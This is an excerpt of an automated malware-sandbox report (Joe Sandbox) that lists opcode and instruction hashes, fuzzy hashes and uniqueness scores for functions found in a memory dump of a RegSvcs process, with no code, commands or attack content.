                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction ID: 63a1a82346da8982d0393ecf540ee4f58417f953407c314333b203a42f29a8f8
                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction Fuzzy Hash: 4E31A931600614AFE721CF69C884F6AB7F9FF44314F1044AAE5429B2A0E730EE42CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c8932478557e0c9371819e2787420944fff9c59a924a11959a05e256d4f494c
                                                          • Instruction ID: c683cd3a0c31bd171ddcd59e89de841239c7246bba0de53c405c2407abab4381
                                                          • Opcode Fuzzy Hash: 0c8932478557e0c9371819e2787420944fff9c59a924a11959a05e256d4f494c
                                                          • Instruction Fuzzy Hash: 4D31B475600205DFCB14CF1CC4849AE77B5FFA4304B96485AE819AB3A1E731EA41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b46c6e79d589ae2512cf8f4f00ceb03803001eafe2d179a749c08c46e4710876
                                                          • Instruction ID: 041cf6481800a501e340da3074b44af86599d5375c0d5fd402cbc728b2f330b0
                                                          • Opcode Fuzzy Hash: b46c6e79d589ae2512cf8f4f00ceb03803001eafe2d179a749c08c46e4710876
                                                          • Instruction Fuzzy Hash: C22180729001299BCF21DF59C881AFFB7F4FF58740B55006AF541AB260D738AD42CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5e53a315f45de3921bbc7cab98e49421b2f968b4788491e8d1874e45210130b
                                                          • Instruction ID: 418f1cc51127debf765d110d8d77003875dc0bd0e4e78f5de6b46cec22da5f37
                                                          • Opcode Fuzzy Hash: b5e53a315f45de3921bbc7cab98e49421b2f968b4788491e8d1874e45210130b
                                                          • Instruction Fuzzy Hash: 1E218B71600655ABE725DF69C880BAAB7B8FF58740F14006AF944DB7A0D634ED41CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2181cd9f82a4eb8ffbb605f6c9e335370033494448b157d11d7ab3baa80d5ed
                                                          • Instruction ID: fb93e8c2aabc702ce93f173c19e582c82af1ba71ed56c6a2e4865dd3435f9ac6
                                                          • Opcode Fuzzy Hash: b2181cd9f82a4eb8ffbb605f6c9e335370033494448b157d11d7ab3baa80d5ed
                                                          • Instruction Fuzzy Hash: 6221B3725053469BE711DF6AC888B9BBBECBFA1640F08445BBD80C7271D734D949C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e4778af01b3bb7a55e7ba28dba30eadfab07f211fec8ce346e31ec08cc9fb00
                                                          • Instruction ID: e28a35a743745640ae1502a8787b14a093293fa21775a7ecad77f0f645622189
                                                          • Opcode Fuzzy Hash: 3e4778af01b3bb7a55e7ba28dba30eadfab07f211fec8ce346e31ec08cc9fb00
                                                          • Instruction Fuzzy Hash: 6321F532605682DBF722966D8C04F267B95AF41B64F290367FA609B7F2D7B888038250
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d67b3e9e68a7a013be4a0f1c7d65c2c98710e6ec844adb95ee89f7e6fcf27eea
                                                          • Instruction ID: d80d0ace4c430ec3b98530ecbf31e3c402ded1f12d77e7d2be63cda662e87b5d
                                                          • Opcode Fuzzy Hash: d67b3e9e68a7a013be4a0f1c7d65c2c98710e6ec844adb95ee89f7e6fcf27eea
                                                          • Instruction Fuzzy Hash: 7921AC76200A11DFC725DF29C800B46B7F5BF28B08F24846DE549CB761E371E842CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5194b8ef7023a4b19556cb711bb10c44d4cc62d8b9f0110085d5cf570d90943b
                                                          • Instruction ID: 9eb6960513a358d57cb4a26a66ec84ffdd9fb90272600ccac9b38e6731d412a8
                                                          • Opcode Fuzzy Hash: 5194b8ef7023a4b19556cb711bb10c44d4cc62d8b9f0110085d5cf570d90943b
                                                          • Instruction Fuzzy Hash: 7C110672380B12BFE722565A9C05F2776D9DBE4B61F71042AB708DB2B4EBB0DC018795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95c8e30de0f3d9a53e5387771666de05acb87211fc6eaa82c6e644e68fd0f4a5
                                                          • Instruction ID: 6fba2ff189ba9d7946536b1a5b13477ce2c485e052e3089165c2df70d67f6378
                                                          • Opcode Fuzzy Hash: 95c8e30de0f3d9a53e5387771666de05acb87211fc6eaa82c6e644e68fd0f4a5
                                                          • Instruction Fuzzy Hash: BB21E7B1E00219ABDB20DFAAD9809EEFBF8FFA9610F10012FE505A7254D7749945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction ID: 7efbd8a7e63228b3a4a4f138935128fa304b4fd70647d34ea23e31f956239fd4
                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction Fuzzy Hash: 32218E76A0020AEFDF129F99CC40BAEBBF9EF98720F21441AF940A7261D734D9518B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction ID: dc5ab5d01c46e3592b01479f656e6467037462ed094c96e29617d1e5d95e70d1
                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction Fuzzy Hash: 5311E2B2600605EFE7229F45CC40FDABBBCEB90758F10002BF6008B2A0D676ED45CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f1bb81e129c7e40360c3822c93c3cda76b496863d53735ac2eee05f4445db18
                                                          • Instruction ID: 9924d36620603eef61f973fe1c180fd4155f30bc2d2d20885b2fa9c9ccfd018e
                                                          • Opcode Fuzzy Hash: 7f1bb81e129c7e40360c3822c93c3cda76b496863d53735ac2eee05f4445db18
                                                          • Instruction Fuzzy Hash: 6911D3357006129B9B16CF4DC880A17FBE6AF9E710B14416EFE08CF310D7B1E9028790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction ID: 593b70c0f8bf44c034d381fbb3b9478b62e0af8f922f4c58f5b2a978a085ec98
                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction Fuzzy Hash: 98218E72600A41DFD7319F4AC540A66FBEAEB94F54F25883EEA45AB720C730EC01CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7233af6c994b8ef86f84c45803043a789c2704e3992391d7f0a2137a331513fa
                                                          • Instruction ID: 595222abc31739a3bb62c2040fd6ad1feb38833a8815b4fae29a187ff5e6d557
                                                          • Opcode Fuzzy Hash: 7233af6c994b8ef86f84c45803043a789c2704e3992391d7f0a2137a331513fa
                                                          • Instruction Fuzzy Hash: ED215E75A00206DFCB14CF98C581A6EFBB5FB89314F24426EE505AB325C771AD06CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51b74b7419adc14ce9a9c4766ced38da5982dbf4639edce94537052bf6deec30
                                                          • Instruction ID: d5a4ad463d497dce1f6d70917214c36feb5a7786950fa55c1880549b017cd2ed
                                                          • Opcode Fuzzy Hash: 51b74b7419adc14ce9a9c4766ced38da5982dbf4639edce94537052bf6deec30
                                                          • Instruction Fuzzy Hash: 9E219D75601A01EFD7308F69C880F66B7F8FF44254F45882EE5AAC7260DA74BC40CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c04f659030b44a896e7bca89f62ac51481f3141ab87bf00da578a5c8b631c994
                                                          • Instruction ID: eeb8f8fa2210dfb1924960dacb7365fd86643fd3e1fb3ac156b246c338a0ce1a
                                                          • Opcode Fuzzy Hash: c04f659030b44a896e7bca89f62ac51481f3141ab87bf00da578a5c8b631c994
                                                          • Instruction Fuzzy Hash: 5011C436240515EBD762DB5AC940FDB77A8EF59A60F12802EF201DB371DA70D901C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ac568363eee3accef2140b083c3f9a31899c4c7d39945ada21c8a1cb5034e0a
                                                          • Instruction ID: 57cf5ebb90989352847c2e096415784eb55a9155ade87134a3e9e5322c6bc6dc
                                                          • Opcode Fuzzy Hash: 6ac568363eee3accef2140b083c3f9a31899c4c7d39945ada21c8a1cb5034e0a
                                                          • Instruction Fuzzy Hash: 5D110C733001249BCF19DB29DC45A6BB666EBD5374B29453ADD22DB3A1E9309902C390
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29708ce6ea25cbe17b19a90e8bfebae979e8b137b933b411bbcf518c063d7020
                                                          • Instruction ID: ae01e696ca8c85b2246290521fbb6c39e1393274776bc96e3af780ec658b6a3c
                                                          • Opcode Fuzzy Hash: 29708ce6ea25cbe17b19a90e8bfebae979e8b137b933b411bbcf518c063d7020
                                                          • Instruction Fuzzy Hash: 6311BF76A01255DBCB25CF99D580A5ABBE8AF94615F06407EE9059B320E638DD00CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction ID: 8682f03d55f47ef353e24cef9d85ddf44ab40ae55b877396c5e0d1a1df65ce85
                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction Fuzzy Hash: 12110436A00915AFDB19CB58CC05F9EFBF5EF94210F15826EE94597350E631AD01CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction ID: aaf87885af6f574e5d48aca0b23950cd87782f2f7c55eeebee23c42353101690
                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction Fuzzy Hash: DC2106B5A00B459FE3A0CF29C540B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction ID: ab5c362942b8919a5ceda68643c0dbf02a04bbc0bf28e8105cd37ac382a30b34
                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction Fuzzy Hash: 0F119131600A01EFE7219F49C880BD77BE5EBD5754F05842EEA09AB270D771DC40D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 591a92d93157d21aebb0dd2b00e437d84ed1a060fe49bd167a97c9391620c2c0
                                                          • Instruction ID: e8d7cf8aade9fe557ca47adff12d1917e9a60d4e44da01ed31a529e1482bb842
                                                          • Opcode Fuzzy Hash: 591a92d93157d21aebb0dd2b00e437d84ed1a060fe49bd167a97c9391620c2c0
                                                          • Instruction Fuzzy Hash: 97012671705685ABF316A6AED884F2B6F9DEF90754F19016BFD008B272D974DC02C2B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54b1cd865391d48b745cdaa6b2108122b78fa52ae50e3a17db8195be1cff2438
                                                          • Instruction ID: 60e304e0367cccbc6a4d10bf99cd198a3cf562ba1f63c835083de2f5a8768e74
                                                          • Opcode Fuzzy Hash: 54b1cd865391d48b745cdaa6b2108122b78fa52ae50e3a17db8195be1cff2438
                                                          • Instruction Fuzzy Hash: F311A076200645AFDB26CF9AD840F967BA4EBDAB64F18411BF9148B7A0C370E800CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37b5179893f3f38ba0db695c1906df1bc004d2f83c10d3dbae5b907fe134d3e5
                                                          • Instruction ID: 9cb52c5e297db32d6c53a91518f518011ca3d765a2420035b44d1ec03dd6e498
                                                          • Opcode Fuzzy Hash: 37b5179893f3f38ba0db695c1906df1bc004d2f83c10d3dbae5b907fe134d3e5
                                                          • Instruction Fuzzy Hash: D811C636200A119FDB23DAA9D840F5BB7E5FFC4710F154419EB928B6D0DA30E802C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e9e8e7619cd83f46e53cc3e2599517c557c6f43aff2b1ab3cba8455aca816bd
                                                          • Instruction ID: 7ac9e155f8a689de05c24c81556815ce4e340d98fccb9e3b639fae32595fa6b8
                                                          • Opcode Fuzzy Hash: 4e9e8e7619cd83f46e53cc3e2599517c557c6f43aff2b1ab3cba8455aca816bd
                                                          • Instruction Fuzzy Hash: 1411E972900715ABDB21DF5AD980B5FFBBCFF94754F51045ADA05A7310D730AD018B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70181994ab6222e9f059dd54d4aab2d702505d986a9c0465525f0366453770c0
                                                          • Instruction ID: 0ea30b67d8cfe7729cd1bed0cd2acb93dc3569e643238d7c4bd6bc6868d770a5
                                                          • Opcode Fuzzy Hash: 70181994ab6222e9f059dd54d4aab2d702505d986a9c0465525f0366453770c0
                                                          • Instruction Fuzzy Hash: 1201C0725201059FC325DF29D404F66BBE9FB96314F21816BE5049B272E770AD46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction ID: 75d1bc65366f75226dbeff8660f62404ea3290a6a3c7f1db284386f790731204
                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction Fuzzy Hash: D311C2722056C69BFB229B6C8944B26BF94AB01B88F1900A3DE41D7773F338C947C250
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 041df909fef301996affcab612ac321e1a09b6d05f02005f86be28d7439e263c
                                                          • Instruction ID: ba5916a9d3e965000d47813287817f301ede52a6d94cd8dbda2eff9df8c84593
                                                          • Opcode Fuzzy Hash: 041df909fef301996affcab612ac321e1a09b6d05f02005f86be28d7439e263c
                                                          • Instruction Fuzzy Hash: 73018471A0020AEFDB04DFA9D4419AEB7F8FF58300F10401AF900EB391D6749901CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f88a220e2a500de36f13a8117000133f20f4f212174c9d6ad39cf6a7288730a4
                                                          • Instruction ID: d3d55663245ff5c6a498c381dc30203df26f3c7b5834923af43b40defb5861ab
                                                          • Opcode Fuzzy Hash: f88a220e2a500de36f13a8117000133f20f4f212174c9d6ad39cf6a7288730a4
                                                          • Instruction Fuzzy Hash: 580144B1A0020AEFDB04DFA9D4419EEB7F8FF58704F50405AF914EB390D6749D018BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction ID: 2788b5c910a936c17b37bd88ae46e11bf69b28b55903a908613e83a244cce6e6
                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction Fuzzy Hash: 2E01F4322006869BE322D75DC845F5ABB9CEF61755F0940BBFA848B7B1E678C802C211
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3bfe2dcd320edbaa0f1b59d63d2396303199702767c58b73e408849835b93b4
                                                          • Instruction ID: 1aec354da64968dc9f98cf5db8cd07192ce0c5451e96f69abf4214cbb1c9d2dc
                                                          • Opcode Fuzzy Hash: e3bfe2dcd320edbaa0f1b59d63d2396303199702767c58b73e408849835b93b4
                                                          • Instruction Fuzzy Hash: DE018F71A00259DFDB10DFA9D841AEEBBF8BF58310F14005AE500AB290D774EA01CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction ID: a618a895df1b5be7a53c7268402acc3362c3faf41f52bec98243a93752099624
                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction Fuzzy Hash: 98F01D7220001DBFEF019F95DD80DEF7B7EEB69698B114129FA1192170D635DD21ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 322668f9b4c5c6fb762228bbc4a2df8a0204a862b49dbe13d430a693b308533e
                                                          • Instruction ID: a3f19dff880579356d24e161a09245fd98cb3287d7238c3646003a87ddc21197
                                                          • Opcode Fuzzy Hash: 322668f9b4c5c6fb762228bbc4a2df8a0204a862b49dbe13d430a693b308533e
                                                          • Instruction Fuzzy Hash: 59018936110219ABCF229E84D840EDA7F66FB4C754F168116FE1866220C336D971EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe0299a07094761020ccf347e1b4d20caa50c4484381c2385958ba68434b124
